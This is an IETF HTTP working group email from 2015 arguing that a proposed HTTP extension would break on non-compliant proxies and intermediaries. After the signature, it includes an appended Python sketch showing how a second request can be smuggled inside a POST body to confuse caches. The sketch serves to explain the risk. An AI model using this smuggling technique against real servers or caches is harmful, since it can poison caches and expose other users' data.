- From: Willy Tarreau <w@1wt.eu>
- Date: Wed, 29 Apr 2015 18:21:18 +0200
- To: "henry.story@bblfish.net" <henry.story@bblfish.net>
- Cc: Michael Sweet <msweet@apple.com>, Eric Covener <covener@gmail.com>, HTTP Working Group <ietf-http-wg@w3.org>
On Wed, Apr 29, 2015 at 06:08:16PM +0200, henry.story@bblfish.net wrote:
> > Yes and local anti-virus agents deployed on the PC, accessing the traffic
> > in the browser before it's encrypted and which are well-known for not
> > following standards and causing false bug reports.
>
> yes of course. Research is needed here, as I pointed out previously.

Research *was done* already, and it led to the warning in the RFC. It also led people to decide that they don't want to waste their time implementing HTTP/2 in the clear, nor sending WebSocket on port 80, because some broken intermediaries are there. Sure, these will fade away, and the upgrade protocols involved are designed to support a graceful fallback in case of failure. Despite this, there's some breakage in the field. What you're trying to do relies on something deeply buried in the roots of HTTP which faces even more potential for breakage and security issues (e.g. send a second request in the body and cross fingers for caches not to take it and inject the first response's contents for the second request; a minimal sketch of this risk follows the message).

> The situation may not be as bad as feared (my Apache server worked fine,
> for example).

Sure, your Apache server worked fine. It's easy to spot standards-compliant products which have no problem parsing a message complying with standards. It's much harder to spot the bad ones, because in general they're much less visible (which is why we call them interception proxies). Sometimes it will be your load balancer, sometimes your firewall, sometimes a compression module in your server, sometimes a URL filter.

Just two weeks ago I had a customer complain that haproxy was preventing his POST payload from reaching the server and causing timeouts. The network trace revealed that it indeed never left the client... He was running a broken "bandwidth limitation" product on the PC (that's a nice way to save bandwidth). That's just one example of all the crap you can find in the field which will take years to get detected and even more to get fixed. And even products which used to be standards-compliant for some time would now be broken by your extension, leading to even more confusion.

> This research will then help work out what the deployment
> strategy has to be.
>
> Is this hypothetical problem the only one?

What is hypothetical is not the problem but your belief that you can inventory all the cases of trouble in a finite time by doing some research.

> Perhaps we can put this aside
> for the time being and see if there are other issues that are problematic.

Well, you can use it between your own components, but you'll have a hard time explaining to all your users that their freshly acquired products, which respected the standard until 2015, are no longer standards-compliant past 2015. At least with Upgrade we had the ability to play on the compliance side to convince vendors to fix their crap and sell the fixes as feature updates ("support for WebSocket and HTTP/2").

Willy
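To illustrate the body-smuggling risk mentioned above, here is a minimal sketch in Python. The host and paths (`example.com`, `/submit`, `/private`) are hypothetical placeholders; the point is only that the POST body is itself a syntactically complete HTTP request, which a compliant server treats as opaque payload, but which a broken intermediary re-parsing the byte stream may interpret as a second request, then cache the first response under the second request's URL.

```python
import socket

# Inner message: a complete, well-formed HTTP request used as the POST body.
# A standards-compliant server never parses this; it is just payload bytes.
inner = (
    b"GET /private HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"\r\n"
)

# Outer request: Content-Length covers the inner request exactly, so any
# correct parser consumes it as body data and sees a single request.
outer = (
    b"POST /submit HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: " + str(len(inner)).encode("ascii") + b"\r\n"
    b"\r\n"
) + inner

# Send the raw bytes and print whatever comes back. A broken cache sitting
# on this path could wrongly split the stream into two requests and then
# associate the response to /submit with the /private URL.
with socket.create_connection(("example.com", 80)) as conn:
    conn.sendall(outer)
    print(conn.recv(4096).decode("utf-8", errors="replace"))
```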
Received on Wednesday, 29 April 2015 16:21:46 UTC